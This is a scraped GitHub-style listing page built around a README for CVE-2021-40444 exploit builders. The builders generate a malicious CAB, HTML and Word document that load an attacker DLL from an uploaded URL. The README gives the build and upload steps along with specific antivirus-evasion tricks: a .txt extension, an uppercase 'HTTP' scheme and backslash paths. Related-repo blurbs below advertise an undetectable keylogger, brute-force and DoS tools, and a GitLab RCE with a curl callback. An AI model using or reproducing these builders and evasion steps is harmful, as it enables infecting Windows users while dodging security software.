This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit

Related tags

Security related resourcesCVE-2021-40444_builders
Overview

CVE-2021-40444 builders

This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit. This repo is just for testing, research and educational purposes. You are responsible for how you use the code provided in this repo.

The code is developed by reversing malware samples found in wild and shared by various security researchers.

The builders for this CVE are already public. The purpose of this repo is to check how effectively we can bypass static detections by different AV vendors for the docx files, at the time of writing.

The JS code can easily obfuscated by online tools or manually. But the docx file contains just one file which is document.xml.rels, on which the signatures can be based. What we can tamper in it so we can evade static detections of most of the AV.

The cabrc.exe is Microsoft exe included in Internet Explorer Administration Kit and can be downloaded from https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads and after installation you would find this exe in "C:\Program Files (x86)\Windows IEAK 11"

There are 3 builders.

The code works for python 2.7

First go to CVE-2021-40444 folder and place your dll file there and rename it to IEcache.inf (or you can use the calc dll already there).

Then go to source folder and generate the cab file

c:\cve-2021-40444\sources\python generate_cab.py

Upload your cab file, and using the cab file URL generate the html file

c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Note instead of using html extension, if we use .txt the exploit still works, but bypasses AV)

Now finally upload your html file and generate the doc file. Use HTTP (capital) instead of http, and "" instead of "/", to bypass AV. And we dont need x-usc: too.

example: c:\cve-2021-40444\sources\python\generate_html.py generate_doc.py HTTP:\\192.168.1.12\new\tests.txt

The result is in front of you.







www.aslitsecurity.com
[email protected]

Owner
ASL IT Security
ASL IT Security
GitHub Repository
PwdGen is a Python Tkinter tool for generating secure 16 digit passwords.

PwdGen ( Password Generator ) is a Python Tkinter tool for generating secure 16 digit passwords. Installation Simply install requirements pip install

zJairO 7 Jul 14, 2022
A python script to turn Ubuntu Desktop in a one stop security platform. The InfoSec Fortress installs the packages,tools, and resources to make Ubuntu 20.04 capable of both offensive and defensive security work.

infosec-fortress A python script to turn Ubuntu Desktop into a strong DFIR/RE System with some teeth (Purple Team Ops)! This is intended to create a s

James 41 Dec 30, 2022
This project is all about building an amazing application that will help users manage their passwords and even generate new passwords for them

An amazing application that will help us manage our passwords and even generate new passwords for us.

1 Jan 23, 2022
The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

Billy 114 Dec 26, 2022
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co

Podalirius 396 Jan 08, 2023
Security audit Python project dependencies against security advisory databases.

Security audit Python project dependencies against security advisory databases.

52 Dec 17, 2022
一款针对向日葵的识别码和验证码提取工具

Sunflower_get_Password 一款针对向日葵的识别码和验证码提取工具 👮🏻‍♀️ 免责声明 由于传播、利用Sunflower_get_Password工具提供的功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任。 安装环境 本工具使用Python

635 Dec 20, 2022
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
EMBArk - The firmware security scanning environment

Embark is being developed to provide the firmware security analyzer emba as a containerized service and to ease accessibility to emba regardless of system and operating system.

emba 175 Dec 14, 2022
Js File Scanner This is Js File Scanner

Js File Scanner This is Js File Scanner . Which are scan in js file and find juicy information Toke,Password Etc.

122 Dec 12, 2022
A tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine or expire obfuscated scripts.

PyArmor Homepage (中文版网站) Documentation(中文版) PyArmor is a command line tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine

Dashingsoft 1.9k Dec 30, 2022
Notebooks, slides and dataset of the CorrelAid Machine Learning Winter School

CorrelAid Machine Learning Spring School Welcome to the CorrelAid ML Spring School! In this repository you can find the slides and other files for the

CorrelAid 12 Nov 23, 2022
Instagram brute force tool that uses tor as its proxy connections

Insta-crack This is a instagram brute force tool that uses tor as its proxy connections, keep in mind that you should not do anything illegal with thi

Liam 3 Jan 28, 2022
macOS persistence tool

PoisonApple Command-line tool to perform various persistence mechanism techniques on macOS. This tool was designed to be used by threat hunters for cy

Cyborg Security, Inc 212 Dec 29, 2022
MozDef: Mozilla Enterprise Defense Platform

MozDef: Documentation: https://mozdef.readthedocs.org/en/latest/ Give MozDef a Try in AWS: The following button will launch the Mozilla Enterprise Def

Mozilla 2.2k Jan 08, 2023
Just another script for automatize boolean-based blind SQL injections.

SQL Blind Injection Tool A script for automatize boolean-based blind SQL injections. Works with SQLite at least, supports using cookies. It uses bitwi

RIM 51 Dec 15, 2022
A Python tool to automate some dorking stuff to find information disclosures.

WebDork v1.0.3 A open-source tool to find publicly available sensitive information about Companies/Organisations! WebDork A Python tool to automate so

Rahul rc 123 Jan 08, 2023
Undetectable Keylogger that reports to Discord

FUD Keylogger That Reports To Discord This python script will capture all of the keystrokes within a given time frame and report them to a Discord Ser

Dimitris Kalopisis 36 Dec 20, 2022
Security System using OpenCV

Security-System Security System using OpenCV Files in this Repository: email_send.py - This file contains python code to send an email when something

Mehul Patwari 1 Oct 28, 2021
Simple script for looping a Denial Of Service (DoS) attack over one single mac address in range

Bluetooth Simple Denial Of Service (DoS) Legal Note This project is made only for educational purposes and for helping in Proofs of Concept. The autho

1 Jan 09, 2022